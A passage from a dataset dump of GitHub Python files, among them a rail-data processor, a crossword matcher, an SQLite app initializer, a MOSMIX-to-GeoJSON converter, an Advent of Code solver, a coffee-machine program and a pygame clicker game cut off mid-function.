open(\"D:\\软件工程课程设计\\全国高铁信息\\高铁具体信息.json\" ,\"r\",encoding=\"utf-8\") as jf:\n results = json.load(jf)\n\n for stations in results:\n\n for station in stations:\n train_station = station[\"train_station\"]\n\n if train_station in all_stations.keys():\n all_stations[train_station].append(station[\"station_id\"])\n else:\n all_stations[train_station] = [station[\"station_id\"]]\n\ndef find_max_time():\n times = []\n with open(\"G:\\软件工程课程设计\\全国高铁信息\\高铁具体信息.json\" ,\"r\",encoding=\"utf-8\") as jf:\n results = json.load(jf)\n\n for train in results.keys():\n times.append(len(results[train]))\n\n return min(times)\n\n\ndef handle_data():\n\n all_Infos = {}\n\n for station in all_stations.keys():\n all_Infos[station] = {}\n\n for station in all_Infos.keys():\n\n for results in all_stations[station]:\n all_Infos[station][results] = []\n\n with open(\"G:\\软件工程课程设计\\全国高铁信息\\高铁具体信息.json\", \"r\", encoding=\"utf-8\") as jf:\n\n results = json.load(jf)\n for station_start in all_Infos:\n\n for train in all_Infos[station_start]:\n stations = []\n\n if len(results[train]) > 10:\n pass\n\n else:\n for station_info in results[train]:\n\n stations.append(station_info[\"train_station\"])\n\n for station in stations:\n\n if station == station_start:\n i = stations.index(station)\n\n for n in stations[i:]:\n all_Infos[station_start][train].append(n)\n\n for station in all_Infos:\n for train in list(all_Infos[station].keys()):\n if len(all_Infos[station][train]) <= 1:\n del all_Infos[station][train]\n else:pass\n times = []\n\n for station in list(all_Infos.keys()):\n if len(all_Infos[station]) == 0:\n del all_Infos[station]\n\n for station in list(all_Infos.keys()):\n if len(all_Infos[station]) == 0:\n print(station)\n\n for station in list(all_Infos.keys()):\n\n for train in all_Infos[station].keys():\n times.append(len(all_Infos[station][train]))\n\n print(max(times))\n\n return all_Infos\n\nif __name__ == '__main__':\n all_stations = {}\n find_all_station()\n\n all_Infos = handle_data()\n\n print(all_Infos)\n\n jsObj = json.dumps(all_Infos, ensure_ascii=False, indent=4)\n fileObject = open(\"G:\\软件工程课程设计\\全国高铁信息\\高铁车站出发信息.json\", \"w\", encoding=\"utf-8\")\n fileObject.write(jsObj)\n fileObject.close()","repo_name":"Easter/train-time-search","sub_path":"课程设计/handle_data.py","file_name":"handle_data.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"37149966715","text":"def findMatch(possibleMatches, crossword):\n for match in possibleMatches:\n is_matched = True\n match_length = len(match)\n if match_length == len(crossword):\n for i in range(match_length):\n if crossword[i] not in ['.', match[i]]:\n is_matched = False\n break\n if is_matched:\n return match\n\nmatches = [\n'vaporeon',\n'jolteon',\n'flareon',\n\"espeon\",\n\"umbreon\",\n\"leafeon\",\n\"glaceon\",\n\"sylveon\"\n]\n\ncrossword = 'g...eon'\nmatch = findMatch(matches, crossword)\nprint(match)","repo_name":"jurayev/algorithms-practice","sub_path":"aid/aid_crossword.py","file_name":"aid_crossword.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9153159637","text":"import sys\nimport os\nimport pathlib\nimport sql_helper\nimport helper\n\nfrom pathlib import Path\nfrom sql_helper import *\nfrom helper import *\n\nDOLARIND = Path.cwd()/'.'\nBFP = {\n\t\t\t\t\t\"directories\": \n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"dolarin\": DOLARIND,\n\t\t\t\t\t\t\t\"program_data\": DOLARIND/'program_data', \n\t\t\t\t\t\t\t\"program_terminal_outputs\": DOLARIND/'program_data'/'program_terminal_outputs',\n\t\t\t\t\t\t\t\"users_data\": DOLARIND/'users_data',\n\t\t\t\t\t\t},\n\t\t\t\t\t\t\n\t\t\t\t\t\"files\":\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"program_logs\": DOLARIND/'program_data'/'logs.txt'\n\t\t\t\t\t\t},\n\t\t\t\t\t\n\t\t\t\t\t\"databases\":\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"dolarin_db\": DOLARIND/'Dolarin.db'\n\t\t\t\t\t\t}\n\t\t\t\t}\n\nAuthor_Data = {\n\t\t\t\"author\":\n\t\t\t\t{\n\t\t\t\t\t\"name\": \"Mashiur Rahman\",\n\t\t\t\t\t\"email\": \"mahimnhd97@gmail.com\"\n\t\t\t\t}\n\t\t}\n\nTH = helper.Th()\n\n\nT = None\n\ndef initializeTerminal(show_on_terminal=False):\n\t# generate terminal file name with the timestamps\n\ttimestamps=BFP['directories']['program_terminal_outputs']/(helper.currentTime().replace(' ', '').replace('::', ''))\n\tfile_path = helper.extentifyWith(timestamps, \"ops\")\n\thelper.confirmFile(file_path)\n\t\n\t# initializing global T with Terminal\n\tglobal T\n\tT = helper.Terminal(terminal_file_name = file_path, show_on_terminal=show_on_terminal)\n\treturn T\n\n\ndef torchDES(dir_path, des_dict={}):\n\tdir_path = str(dir_path)\n\t\n\tif(not os.path.isdir(dir_path)):\n\t\tpass\n\tentries = os.listdir(dir_path)\n\tfor e in entries:\n\t\tepath = os.path.join(dir_path, e)\n\t\tif os.path.isfile(epath):\n\t\t\tdes_dict[e] = epath\n\t\telif os.path.isdir(epath):\n\t\t\tdes_dict[e] = torchDES(epath, {\"path\": epath})\n\t\t\t\n\treturn des_dict\n\ndef initializeDFD():\n\tglobal BFP\n\tBFP['DFD'] = torchDES(DOLARIND)\n\t\n\ndef getDSFor(string=\"\", data={}, tabs=\"\"):\n\tif(type(data)==type({})):\n\t\tfor key in data:\n\t\t\tstring+= tabs+key+\":\\n\"\n\t\t\tstring = getDSFor(string, data[key], tabs+\"\\t\")\n\telif(type(data)==type([])):\n\t\tfor i in data:\n\t\t\tstring = getDSFor(string, i, tabs+\"\\t\")\n\telse:\n\t\tstring += tabs+str(data)+\"\\n\"\n\treturn string\n\n\ndef insertADummyUser():\n\tr = sql_helper.getResult(str(BFP['databases']['dolarin_db']), \"SELECT id FROM USER WHERE id=1\")\n\tif(r==None):\n\t\tdb_name = str(BFP['databases']['dolarin_db'])\n\t\tstatement = \"INSERT INTO USER VALUES(1, ?, ?, ?);\"\n\t\ttuple_value = (\"mash97\", \"yossup\", str(BFP['directories']['users_data']/(\"mash97_1.db\")))\n\t\tr = sql_helper.executeDML(db_name, statement, tuple_value)\n\t\t\n\t\tTH.pts(\"--> Dummy USER inserted\")\n\t\t# ~ print(r)\n\t\n\t\ndef confirmUsersTableInDolarin_DB():\n\tconnection = sqlite3.connect(str(BFP['databases']['dolarin_db']))\n\tif(sql_helper.isTableExistsInDB(str(BFP['databases']['dolarin_db']), 'USER')):\n\t\tprint(\"--> USER table exists in the dolarin_db\")\n\t\n\telse:\n\t\ttry:\n\t\t\tcreated = sql_helper.createTableInDb(User.DATABASE_NAME, User.TABLE_NAME, User.SCHEMA_DICT)\n\t\t\tif not created:\n\t\t\t\tprint(\"###--> Failed to create %s table in the %s\"%(User.TABLE_NAME, User.DATABASE_NAME))\n\t\t\telse:\n\t\t\t\tprint(\"---> %s table is created in the %s\"%(User.TABLE_NAME, User.DATABASE_NAME))\n\t\t\n\t\texcept Exception as e:\n\t\t\tprint(\"###--> Failed to create the\",User.TABLE_NAME,\"table in the dolarin_db:\", e)\n\t\n\tconnection.commit()\n\tconnection.close()\n\tinsertADummyUser()\n\ndef standBFS():\n\tmessage=(\"Making Stand of The BFS\")\n\tTH.pts(cf=cf(), string=message, \n\t\tmode=TH.MODE_ASSERTION)\n\t\t\n\t# Confirming Directories\n\tmessage=\"Checking %s in %s\\n\"%(\"directories\", os.path.abspath(BFP['directories']['dolarin']))\n\tTH.pts(cf=cf(), string=message, \n\t\tmode=TH.MODE_ASSERTION)\n\t\n\tfor directory in BFP['directories']:\n\t\tdir_name = BFP['directories'][directory].name\n\t\tif BFP['directories'][directory].is_dir():\n\t\t\tprint(\"OK:: directory: %s\" % dir_name)\n\t\telse:\n\t\t\tprint(\"W:: directory: %s\" % dir_name)\n\t\t\tos.mkdir(str(BFP['directories'][directory]))\n\t\t\tif(BFP['directories'][directory].is_dir()):\n\t\t\t\tprint(\"OK:: directory: %s\" % dir_name)\n\t\n\t# Confirming Files\n\tmessage=\"Checking %s in %s\\n\"%(\"files\", os.path.abspath(BFP['directories']['dolarin'].__str__()))\n\tTH.pts(cf=cf(), string=message, \n\t\tmode=TH.MODE_ASSERTION)\n\t\t\n\tfor file in BFP['files']:\n\t\tfile_name = BFP['files'][file].name\n\t\tif BFP['files'][file].is_file():\n\t\t\tprint(\"OK:: file: %s\" % file_name)\n\t\telse:\n\t\t\tprint(\"W:: file: %s\" % file_name)\n\t\t\topen(str(BFP['files'][file]), \"w\")\n\t\t\tif(BFP['files'][file].is_file()):\n\t\t\t\tprint(\"OK:: file: %s\" % file_name)\n\t\n\t# Confirming Databases\n\tmessage=\"Checking %s in %s\\n\"%(\"databases\", os.path.abspath(BFP['directories']['dolarin'].__str__()))\n\tTH.pts(cf=cf(), string=message, \n\t\tmode=TH.MODE_ASSERTION)\n\t\t\n\tfor db in BFP['databases']:\n\t\tdb_name = BFP['databases'][db].name\n\t\tif BFP['databases'][db].is_file():\n\t\t\tprint(\"OK:: database: %s\" % db_name)\n\t\telse:\n\t\t\tprint(\"W:: database: %s\" % db_name)\n\t\t\topen(str(BFP['databases'][db]), \"w\")\n\t\t\tif(BFP['databases'][db].is_file()):\n\t\t\t\tprint(\"OK:: database: %s\" % db_name)\n\t\n","repo_name":"mash-97/dolarin","sub_path":"initializor.py","file_name":"initializor.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33712695544","text":"#!/usr/bin/env python3\nimport argparse\nimport json\nimport sys\nfrom importlib import resources\n\nfrom mosmix2geojson.kml2json import kml2geojson\nfrom mosmix2geojson import __version__\n\nMOSMIX_KML_ENCODING = \"latin-1\"\n\n# define parser for argparse\n# dwdkml2geojson --max-stations 7 --jsonindent 2 file.kml > file.geojson\nargparser = argparse.ArgumentParser(description=\"Convert DWD MOSMIX data to GeoJSON.\")\n\n# define arguments\nargparser.add_argument(\"source\",\n nargs=\"?\",\n default=\"-\",\n type=str, # do not use FileType because it does not detect latin-1 for KML\n help=\"source KML file, - for stdin (default: stdin)\",\n metavar=\"SOURCE\")\n\nargparser.add_argument(\"target\",\n nargs=\"?\",\n default=sys.stdout,\n type=argparse.FileType(\"w\"),\n help=\"target JSON file, - for stdout (default: stdout)\",\n metavar=\"TARGET\")\n\nmapping_group = argparser.add_argument_group(\"mapping arguments\",\n description=\"Transform the output with mapped parameters. \"\n \"When a mapping of any kind is applied, unmapped parameters \"\n \"will not be included by default. Change this behaviour with \"\n \"the --keep-unmapped flag. Use this feature at your own risk.\")\n\nmapping_file_arg = mapping_group.add_mutually_exclusive_group()\n\nmapping_file_arg.add_argument(\"--map-to-cf\",\n action=\"store_const\",\n const=\"cf\",\n help=\"produce output with CF standard names or another human readable name where no CF standard name exists\",\n dest=\"integrated_mapping\")\n\nmapping_file_arg.add_argument(\"-m\", \"--mapping-file\",\n type=str,\n help=\"apply a custom mapping to the output\")\n\nmapping_group.add_argument(\"-k\", \"--keep-unmapped\",\n action=\"store_true\",\n help=\"include unmapped parameters in output\")\n\nmapping_group.add_argument(\"--export-cf-mapping\",\n action=\"store_const\",\n const=\"cf\",\n help=\"print the mapping configuration used by --map-to-cf and exit\",\n dest=\"export_mapping\")\n\nargparser.add_argument(\"-x\", \"--max-stations\",\n type=int,\n help=\"number of stations to be processed (default: all stations)\")\n\nargparser.add_argument(\"-i\", \"--json-indent\",\n type=int,\n help=\"indentation blanks for json (default: no indentation)\")\n\nargparser.add_argument(\"-v\", \"--version\", action=\"version\", version=__version__)\n\n\ndef main():\n args = argparser.parse_args()\n\n export_mapping = args.export_mapping\n if export_mapping:\n with resources.open_text(\"mosmix2geojson\", f\"{export_mapping}.mapping.json\") as fp:\n for line in fp:\n print(line, end=\"\")\n return\n\n source = args.source\n if source == \"-\":\n source = sys.stdin\n json_indent = args.json_indent\n max_stations = args.max_stations\n\n param_mapping = None\n integraded_mapping = args.integrated_mapping\n mapping_file = args.mapping_file\n if integraded_mapping:\n with resources.open_text(\"mosmix2geojson\", f\"{integraded_mapping}.mapping.json\") as fp:\n param_mapping = json.load(fp)\n elif mapping_file:\n with open(mapping_file) as fp:\n param_mapping = json.load(fp)\n\n geojson = kml2geojson(source, param_mapping=param_mapping, max_stations=max_stations,\n keep_unmapped=args.keep_unmapped)\n\n json.dump(geojson, args.target, indent=json_indent)\n # add trailing newline\n print(\"\", file=args.target)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DeutscherWetterdienst/mosmix2geojson","sub_path":"src/mosmix2geojson/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"19089949693","text":"import sys\nf = open(\"day7/input.txt\").read()\nrules = f.split(\"\\n\")\nbags = {}\nfor rule in rules:\n rule.strip(\".\")\n sep = rule.split(\" contain \")\n bag = sep[0].rstrip(\"s\")\n others = sep[1].split(\", \")\n if(not others[0].startswith(\"no\")):\n bags[bag] = {(int(item[0]), \"\".join(item[2:]).rstrip(\".\").rstrip(\"s\")) for item in others}\n\n#part 1\ndef parents(bag):\n parents = set()\n for key in bags.keys():\n for value in bags[key]:\n check_bag = value[1]\n if(check_bag == bag):\n parents.add(key)\n return parents\n\ndef all_parents(bag):\n cur_parents = parents(bag)\n if len(cur_parents) == 0:\n return set()\n for b in cur_parents:\n cur_parents = cur_parents | all_parents(b)\n return cur_parents\n\nprint(len(all_parents(\"shiny gold bag\")))\n\n#part 2\n\ndef children(bag):\n return list(bags[bag]) if bag in bags.keys() else []\n\ndef all_children(bag):\n cur_children = children(bag)\n total = 1\n if bag not in bags.keys():\n return 1\n for count, b in cur_children:\n total += count * all_children(b)\n return total\n\nprint(all_children(\"shiny gold bag\")-1)\n\n\n","repo_name":"Nastmi/adventOfCode2020","sub_path":"day7/bags.py","file_name":"bags.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3044008162","text":"from assets import MENU, resources, logo\nfrom os import system, name\n\n\nclass CoffeeMachine():\n __money = 0\n\n def __clear_console(self):\n return system('cls') if name in ['nt', 'dos'] else system('clear')\n\n def collect_money(self, cost) -> bool:\n while True:\n try:\n ten = 10 * int(input(\"How many ₹10 note? \"))\n twenty = 20 * int(input(\"How many ₹20 note? \"))\n fifty = 50 * int(input(\"How many ₹50 note? \"))\n hundred = 100 * int(input(\"How many ₹100 note? \"))\n except ValueError:\n print(\"Please provide a valid input!\")\n continue\n break\n\n total = ten + twenty + fifty + hundred\n\n if total < cost:\n print(\"Sorry that's not enough money. Money refunded\")\n return False\n elif total - cost > 0:\n print(f\"Here's your change ₹{total - cost}\")\n self.__money += cost\n\n return True\n\n def validate_resources(self, ingredients) -> bool:\n for ingredient in ingredients:\n if ingredients[ingredient] > resources[ingredient]:\n print(f\"Sorry there's not enough {ingredient}\")\n return False\n\n for ingredient in ingredients:\n resources[ingredient] -= ingredients[ingredient]\n\n return True\n\n def make_coffee(self, coffee):\n if not self.validate_resources(MENU[coffee]['ingredients']) or not self.collect_money(MENU[coffee][\"cost\"]):\n return\n\n print(f\"Here's your {coffee}☕. Enjoy 😄\")\n\n def process_input(self, usr_in):\n if usr_in == \"report\":\n print(\n f\"Water: {resources['water']}ml\\nMilk: {resources['milk']}ml\\nCoffee: {resources['coffee']}mg\\nMoney: ₹{self.__money}\")\n\n else:\n self.make_coffee(usr_in)\n\n def __init__(self):\n while True:\n self.__clear_console()\n print(logo)\n user_input = input(\n \"What would you like? (espresso/latte/cappuccino): \").lower()\n\n if not user_input in ['report', 'off'] and not user_input in MENU:\n print(\"Please enter a beverage from the menu. \")\n input(\"press enter to continue\")\n continue\n\n if user_input == \"off\":\n print(\"Turning off the machine ...\")\n break\n\n self.process_input(user_input)\n input(\"press enter to continue\")\n\n\nif __name__ == \"__main__\":\n CoffeeMachine()\n print(\"\\nThank you for using my coffee machine :)\\n\\t --MO (Github @1Hanif1)\")\n","repo_name":"1Hanif1/Python-Projects","sub_path":"Coffee Machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"28518762842","text":"\n# Import modules and code/classes/objects from other files\nimport math\n\nimport pygame.font\n\nfrom objects import *\nfrom messages import *\n\n\n# The Main function in which all the GUI code is ran\ndef main():\n\n # ----------------- Initializing Pygame Variables -----------------\n pygame.init()\n clock = pygame.time.Clock() # Clock for adjusting the frames per second\n\n screen = pygame.display.set_mode((WIDTH, HEIGHT)) # The initial Pygame Screen\n\n screen.fill(SCREEN_COLOR)\n pygame.display.set_caption(\"Carbon Clicker\")\n\n application_icon = pygame.image.load(base_path + \"images/carbon_clicker_logo.png\")\n pygame.display.set_icon(application_icon)\n\n logo = ImageRectObject((0, 0, 0, 0), (WIDTH // 2 - 200, HEIGHT // 2 - 200, 400, 400), 0, 0,\n image_file=base_path + \"images/carbon_clicker_logo.png\")\n logo.image = pygame.transform.scale(logo.image, (400, 400))\n\n basic_objects = [\n RectTextObject(SCREEN_COLOR, (WIDTH // 2 - 300, 40, 600, 100), 0, 50,\n text=\"\", text_color=GOLD_COLOR, text_size=60),\n RectTextObject(SCREEN_COLOR, (WIDTH // 2 - 100, 600, 200, 60), 0, 50,\n text=\"\", text_color=GOLD_COLOR, text_size=40),\n RectTextObject(GOLD_COLOR, (WIDTH // 2 - 300, 40, 600, 100), 4, 50,\n text=\"Carbon Clicker!\", text_color=GOLD_COLOR, text_size=60),\n logo,\n ]\n\n start_button = RectTextButton(GOLD_COLOR, (WIDTH // 2 - 100, 600, 200, 60), 4, 50, action=\"start_game\",\n text=\"Start\", text_color=GOLD_COLOR, text_size=40)\n\n stars = []\n\n for star_i in range(400):\n stars.append(Star((0, 0, WIDTH, HEIGHT)))\n\n starting = False\n transparency = 0\n\n # main_game(screen)\n\n # ----------------- The Main GUI Loop -----------------\n running = True\n while running:\n\n # ----------------- Looping through Pygame Events -----------------\n for event in pygame.event.get():\n\n # Quit Pygame\n if event.type == pygame.QUIT:\n running = False\n break\n\n # ----------------- Mouse Released -----------------\n if event.type == pygame.MOUSEBUTTONUP and not starting:\n mouse_pos = pygame.mouse.get_pos()\n if start_button.is_selecting(mouse_pos):\n starting = True\n\n # Re-Draw\n screen.fill(SCREEN_COLOR)\n\n # Draw stars\n mouse_pos = pygame.mouse.get_pos()\n displacement = ((mouse_pos[0] - WIDTH // 2) / 2400.0, (mouse_pos[1] - HEIGHT // 2) / 2400.0)\n\n for star in stars:\n star.update_position(displacement)\n star.draw(screen, False)\n\n is_selected = start_button.is_selecting(mouse_pos)\n\n # Draw objects\n draw_basic_objects(screen, basic_objects)\n start_button.draw(screen, is_selected)\n\n if starting:\n transparency = transparency + 2 + transparency * 0.1\n new_surface = pygame.Surface((WIDTH, HEIGHT), pygame.SRCALPHA)\n new_surface.set_alpha(transparency)\n new_surface.fill((0, 0, 0))\n screen.blit(new_surface, (0, 0))\n\n if transparency >= 255:\n main_game(screen)\n break\n\n # Set the FPS and update\n clock.tick(60)\n pygame.display.update()\n\n # Once the loop has ended, quit the application\n pygame.quit()\n\n\ndef main_game(screen):\n\n # ----------------- Initializing Objects -----------------\n starting = True\n transparency = 255\n\n time = 0 # Used for keeping track of seconds (60 ticks per second)\n clock = pygame.time.Clock() # Clock for adjusting the frames per second\n\n # The Main Panels\n title_panel = RectTextObject((0, 0, 0, 0), LAYER_TITLE_RECT, 0, 0,\n text=\"Carbon Clicker!\", text_color=GOLD_COLOR, text_size=35)\n pollution_cleared_panel = RectTextObject((0, 0, 0, 0), LAYER_POLLUTION_CLEARED_RECT, 0, 0,\n text=\"Pollution Cleared: 000000 lbs\", text_color=GOLD_COLOR, text_size=24)\n pps_panel = RectTextObject((0, 0, 0, 0), LAYER_PPS_RECT, 0, 0,\n text=\"PPS: 000000\", text_color=GOLD_COLOR, text_size=24)\n money_panel = RectTextObject((0, 0, 0, 0), LAYER_MONEY_RECT, 0, 0,\n text=\"$: 000000\", text_color=GOLD_COLOR, text_size=24)\n item_panel = ImageRectTextObject((0, 0, 0), LAYER_ITEMS_RECT, 0, 0, image_file=base_path + \"images/item_panel.png\",\n text=\"Items!\", text_color=GOLD_COLOR, text_size=40)\n\n achievement_title_panel = RectTextObject((0, 0, 0, 0), LAYER_ACHIEVEMENT_TITLE_RECT, 0, 0, text=\"Achievements:\",\n text_color=GOLD_COLOR, text_size=30)\n upgrade_title_panel = RectTextObject((0, 0, 0, 0), LAYER_UPGRADE_TITLE_RECT, 0, 0, text=\"Upgrades:\",\n text_color=GOLD_COLOR, text_size=30)\n\n # ----------------- Sounds -----------------\n click_sound = pygame.mixer.Sound(\"sounds/mouse_click.mp3\")\n click_sound.set_volume(0.4)\n purchase_sound = pygame.mixer.Sound(\"sounds/purchase.mp3\")\n purchase_sound.set_volume(0.6)\n achievement_sound = pygame.mixer.Sound(\"sounds/achievement_sound.mp3\")\n\n # ----------------- Achievements -----------------\n previous_achievement_stage = 0\n achievement = AchievementText((0, 0, 0, 0), (15,\n LAYER_ACHIEVEMENT_TITLE_RECT[1] + LAYER_ACHIEVEMENT_TITLE_RECT[3]+15,\n LAYER_ACHIEVEMENT_TITLE_RECT[2]-15, 135), 0, 0, text=\"\",\n text_color=GOLD_COLOR, text_size=18)\n\n # ----------------- Objects in their lists -----------------\n\n # Create the first layer of basic objects\n basic_objects_layer_1 = [\n ImageRectObject((100, 100, 100), LAYER_LEFT_RECT, 0, 0,\n image_file=base_path + \"images/left_background.png\"),\n ImageRectObject((200, 200, 200), LAYER_MIDDLE_RECT, 0, 0,\n image_file=base_path + \"images/middle_background_border.png\"),\n RectObject((0, 0, 0), LAYER_RIGHT_RECT, 0, 0),\n title_panel,\n pollution_cleared_panel,\n pps_panel,\n money_panel,\n RectObject((0, 0, 0), LAYER_SCROLL_BAR_RECT, 0, 0),\n achievement_title_panel,\n upgrade_title_panel,\n achievement\n ]\n\n # This second layer of objects goes above the items\n basic_objects_layer_2 = [\n item_panel\n ]\n\n stars = []\n\n for star_i in range(NUM_STARS):\n stars.append(Star(LAYER_BOTTOM_RECT))\n\n # ----------------- Scroll Bar -----------------\n holding_scroll_bar = False\n starting_mouse_y = 0\n scroll_bar = ScrollBar((0, 0, 0, 0), (LAYER_RIGHT_RECT[0] + 390, LAYER_RIGHT_RECT[1] + LAYER_ITEMS_RECT[3], 10, 50),\n 0, 0, image_file=base_path + \"images/scroll_bar.png\")\n\n sell_button = ImageButton((0, 0, 0, 0), SELL_BUTTON_RECT, 0, 0, \"SELL\", \"images/sell_button.png\",\n text=\"SELL!\", text_color=GOLD_COLOR, text_size=30)\n\n # ----------------- Buttons -----------------\n buttons = [\n scroll_bar,\n sell_button\n ]\n\n # ----------------- Items -----------------\n item_popup = None\n items = []\n item_base_y_pos = LAYER_ITEMS_RECT[3]\n item_max_y_pos = LAYER_ITEMS_RECT[3]\n item_min_y_pos = LAYER_ITEMS_RECT[3] - NUM_ITEMS * 100 + 6 * 100\n\n for item_type in range(NUM_ITEMS):\n items.append(Item((0, 0, 0, 0), (LAYER_RIGHT_RECT[0], item_base_y_pos + item_type * 100, 390, 100), 0, 0,\n \"ITEM\", item_type, \"\", GOLD_COLOR, 25))\n\n animation_text_list = [] # append later\n\n # ----------------- Upgrades -----------------\n upgrade_count = 0\n upgrades_shown = [0]\n upgrades = []\n upgrade_popup = None\n\n # Create the Upgrade objects\n for _upgrade in range(len(UPGRADE_ORDER)):\n upgrades.append(Upgrade((0, 0, 0, 0),\n (0, LAYER_UPGRADE_TITLE_RECT[1] + LAYER_UPGRADE_TITLE_RECT[3], 73, 73),\n 0, 0, \"UPGRADE\", (UPGRADE_ORDER[_upgrade][0], UPGRADE_ORDER[_upgrade][1]),\n \"\", (0, 0, 0), 0))\n\n # ----------------- Variables and internal Data -----------------\n money = 0\n\n pollution_cleared = 0\n total_pollution_cleared = 0\n previous_pollution_cleared = 0\n pps = 0\n\n click_strength = 0.2\n max_click_interval = 3\n click_interval = 0\n can_click = True\n\n hovering_earth = False\n\n # ----------------- Sprites -----------------\n earth_clicker = Earth(EARTH_CLICKER_RECT)\n sprite_group = pygame.sprite.Group()\n sprites = [earth_clicker,]\n sprite_group.add(sprites)\n\n # Used to determine which objects are selected\n selected_object = None\n\n # ----------------- The Main GUI Loop -----------------\n running = True\n while running:\n\n # ----------------- Looping through Pygame Events -----------------\n for event in pygame.event.get():\n\n # Quit Pygame\n if event.type == pygame.QUIT:\n running = False\n\n # ----------------- Mouse Clicked -----------------\n if event.type == pygame.MOUSEBUTTONDOWN:\n location = pygame.mouse.get_pos()\n colliding_earth = earth_clicker.colliding(location)\n\n # The earth was clicked\n if can_click and colliding_earth:\n earth_clicker.resize_down()\n\n # The scroll bar was clicked\n if selected_object == scroll_bar:\n starting_mouse_y = location[1]\n holding_scroll_bar = True\n\n # ----------------- Mouse Released -----------------\n if event.type == pygame.MOUSEBUTTONUP:\n location = pygame.mouse.get_pos()\n colliding_earth = earth_clicker.colliding(location)\n\n # Calculate changes when the earth has been clicked\n if can_click and colliding_earth:\n click_sound.play()\n earth_clicker.hover()\n pollution_cleared += click_strength\n total_pollution_cleared += click_strength\n\n # Animations\n animation_rect = (location[0]+random.randint(-2, 2), location[1]+random.randint(-2, 2),\n 20, 10)\n animation_text_list.append(AnimatedText((0, 0, 0, 0), animation_rect, 0, 0,\n text=\"+{} pollution cleared\".format(click_strength),\n text_color=(GOLD_COLOR[0], GOLD_COLOR[1], GOLD_COLOR[2], 255)))\n can_click = False\n\n # An Item is being bought\n if type(selected_object) == Item and money >= selected_object.price:\n selected_object.count += 1\n money = round(money - selected_object.price)\n purchase_sound.play()\n\n selected_object.price = round(selected_object.price * 1.1)\n\n # An Upgrade is being bought\n if type(selected_object) == Upgrade and money >= selected_object.price:\n money = round(money - selected_object.price)\n selected_object.purchased = True\n\n for i in range(len(selected_object.affected_items)):\n item = selected_object.affected_items[i]\n items[item].multiplier += selected_object.affected_rates\n\n purchase_sound.play()\n\n upgrades_shown.remove(selected_object.upgrade_order)\n\n # Selling the cleared pollution to gain money\n if selected_object == sell_button:\n money = round(money + pollution_cleared, 1)\n previous_pollution_cleared = 0\n pollution_cleared = 0\n\n # Once the mouse has been released, stop holding the scroll bar\n holding_scroll_bar = False\n\n # ----------------- Calculations -----------------\n\n # Calculate the current rate\n rate = 0\n for item in items:\n rate += item.count * item.rate * item.multiplier\n\n pollution_cleared += rate / 60\n total_pollution_cleared += rate / 60\n\n # ----------------- Achievements -----------------\n achievement_stage = int(math.log(int(max(1, total_pollution_cleared)), 1000))\n if achievement_stage != previous_achievement_stage:\n achievement_sound.play()\n\n earth_clicker.stage = min(4, achievement_stage)\n earth_clicker.redraw()\n\n achievement.text = achievement_messages[min(6, achievement_stage)]\n\n previous_achievement_stage = achievement_stage\n\n # ----------------- Upgrade Calculations -----------------\n if money >= UPGRADE_COSTS[UPGRADE_ORDER[min(len(UPGRADE_ORDER)-1, upgrade_count)][0]] \\\n [UPGRADE_ORDER[min(len(UPGRADE_ORDER)-1, upgrade_count)][1]] and upgrade_count < len(UPGRADE_ORDER)-1:\n upgrade_count += 1\n upgrades_shown.append(upgrade_count)\n\n # Move the upgrades in the correct order\n for upgrade in upgrades:\n if upgrade.upgrade_order in upgrades_shown:\n upgrade.move(len(upgrades_shown) - 1 - upgrades_shown.index(upgrade.upgrade_order))\n\n # ----------------- Formatting information for viewing -----------------\n\n # Display numbers with abbreviations and correct formatting\n pollution_cleared_digits = len(str(int(pollution_cleared)))\n\n # Pollution Cleared calculations\n num_power = int(math.log(int(max(1, pollution_cleared)), 1000))\n pollution_cleared_formatted = str(round(pollution_cleared / (1000 ** num_power), 1)) + \\\n NUMBER_SUFFIX[num_power]\n\n pollution_cleared_panel.text = \"Pollution Cleared: \" + \\\n \" \" * (6 - pollution_cleared_digits) + \\\n pollution_cleared_formatted + \" lbs\"\n\n # PPS (Pollution cleared Per Second) calculations\n current_pps_digits = len(str(int(pps)))\n\n num_power = int(math.log(max(1, int(pps)), 1000))\n pps_formatted = str(round(pps / (1000 ** num_power), 1)) + \\\n NUMBER_SUFFIX[num_power]\n pps_panel.text = \"PPS: \" + \\\n \" \" * (6 - current_pps_digits) + pps_formatted\n\n # Money calculations\n money_digits = len(str(int(money)))\n\n num_power = int(math.log(int(max(1, money)), 1000))\n money_formatted = str(round(money / (1000 ** num_power), 1)) + \\\n NUMBER_SUFFIX[num_power]\n\n money_panel.text = \"$: \" + \\\n \" \" * (6 - money_digits) + \\\n money_formatted\n\n # ----------------- Mouse and Selection -----------------\n mouse_pos = pygame.mouse.get_pos()\n selected_object = get_selected_object(mouse_pos, buttons, items, upgrades)\n colliding_earth = earth_clicker.colliding(mouse_pos)\n if not colliding_earth and hovering_earth:\n hovering_earth = False\n earth_clicker.resize_normal()\n if not hovering_earth and colliding_earth:\n hovering_earth = True\n earth_clicker.hover()\n\n # ----------------- Scroll Bar Movement -----------------\n if holding_scroll_bar:\n\n offset = mouse_pos[1]-starting_mouse_y # The offset in which we need to move the scroll bar\n if (item_base_y_pos > item_min_y_pos or offset < 0) and (item_base_y_pos < item_max_y_pos or offset > 0):\n\n # Make sure that the scroll bar does not move too far\n if offset > 0:\n offset = min(offset, item_base_y_pos - item_min_y_pos)\n if offset < 0:\n offset = max(offset, item_base_y_pos - item_max_y_pos)\n\n scroll_bar.move(offset)\n item_base_y_pos -= 